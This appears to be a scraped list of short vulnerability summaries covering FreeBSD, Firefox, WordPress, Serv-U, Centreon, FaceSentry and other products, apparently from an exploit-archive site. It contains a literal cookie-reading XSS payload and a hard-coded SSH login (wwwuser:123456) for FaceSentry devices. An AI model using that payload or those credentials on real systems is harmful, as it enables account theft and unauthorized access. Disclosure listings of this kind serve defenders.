This exploit script is for FreeBSD-SA-19:02.fd vulnerability. It is written by Karsten König of Secfault Security. It uses libmap.conf primitive inspired by kcope's 2005 exploit for Qpopper. It creates a thread and forks to exploit the vulnerability.
Passing a huge string as an argument to DOMParser.parseFromString will crash the tab in Firefox version 67.0.4.
Authentication Bypass vulnerability in the WP Like Button (Free) plugin version 1.6.0 allows unauthenticated attackers to change the settings of the plugin. The contains() function in wp_like_button.php did not check if the current request is made by an authorized user, thus allowing any unauthenticated user to successfully update the settings of the plugin.
This module attempts to gain root privileges on systems running Serv-U FTP Server versions prior to 15.1.7. The `Serv-U` executable is setuid `root`, and uses `ARGV[0]` in a call to `system()`, without validation, when invoked with the `-prepareinstallation` flag, resulting in command execution with root privileges.
Persistent XSS via 'name' param at /ProtectManager/enforce/admin/senderrecipientpatterns/list. Payload: ' oNmouseover=prompt(document.domain,document.cookie) ) Browser: Firefox 64, IE 11 Date Observed: 15 January 2019
A vulnerability in Centreon v19.04 allows an authenticated user to execute arbitrary code on the server. This is due to the lack of input validation in the 'nagios_bin' parameter of the 'poller_configuration.php' script. An attacker can exploit this vulnerability by sending a malicious payload to the 'nagios_bin' parameter, which will be executed on the server.
FaceSentry facial biometric access control appliance ships with hard-coded and weak credentials for SSH access on port 23445 using the credentials wwwuser:123456. The root privilege escalation is done by abusing the insecure sudoers entry file.
FaceSentry suffers from an authenticated OS command injection vulnerability using default credentials. This can be exploited to inject and execute arbitrary shell commands as the root user via the 'strInIP' POST parameter in pingTest PHP script.
Attacker can edit administrator's credentials like email, password. Then, access the administration panel and takeover the server. A CSRF vulnerability.
An issue was discovered in Safi-pro web-application, there is a directory traversal and both local and remote file inclusion vulnerability which resides in the ?script= parameter which is found on the Script_View page. And attacker can send a specially crafted URL to retrieve and steal sensitive files from teh victim.
Services By CQR